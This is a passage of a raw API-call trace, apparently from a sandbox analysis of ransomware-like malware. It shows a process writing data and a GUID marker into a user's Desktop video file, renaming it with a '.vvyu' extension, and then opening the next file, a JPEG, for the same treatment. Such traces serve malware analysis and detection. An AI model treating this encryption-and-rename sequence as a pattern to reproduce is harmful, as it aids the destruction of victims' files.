Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.207] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.208] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1130) returned 0x2d41908 [0184.208] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312a0 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312e8 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.209] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42a40 [0184.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42a40 | out: hHeap=0x6a0000) returned 1 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e8e8 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.211] GetCurrentThreadId () returned 0x264 [0184.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d368c8 [0184.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.212] GetCurrentThreadId () returned 0x264 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42a40 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42c58 [0184.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42a40 | out: hHeap=0x6a0000) returned 1 [0184.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42c58 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d312e8 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.223] WriteFile (in: hFile=0x584, lpBuffer=0x2d41908*, nNumberOfBytesToWrite=0x1128, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d41908*, lpNumberOfBytesWritten=0x30ffb14*=0x1128, lpOverlapped=0x0) returned 1 [0184.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.223] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x112d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.224] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.225] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.226] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.226] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.226] CloseHandle (hObject=0x584) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.227] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YYyX_.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\yyyx_.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YYyX_.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\yyyx_.avi.vvyu")) returned 1 [0184.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.230] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.233] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZsR7Xc26_DfdmVcahH", cAlternateFileName="ZSR7XC~1")) returned 1 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0184.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0184.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0184.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.235] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d9fe10, ftCreationTime.dwHighDateTime=0x1d8a1d3, ftLastAccessTime.dwLowDateTime=0x5811b9f0, ftLastAccessTime.dwHighDateTime=0x1d8a25b, ftLastWriteTime.dwLowDateTime=0x5811b9f0, ftLastWriteTime.dwHighDateTime=0x1d8a25b, nFileSizeHigh=0x0, nFileSizeLow=0xd8e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gEmDK.jpg", cAlternateFileName="")) returned 1 [0184.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312e8 [0184.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d312e8 | out: hHeap=0x6a0000) returned 1 [0184.236] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\_gEmDK.jpg") returned=".jpg" [0184.236] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\_gEmDK.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\_gemdk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.236] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=55525) returned 1 [0184.236] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.239] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd8bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.239] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 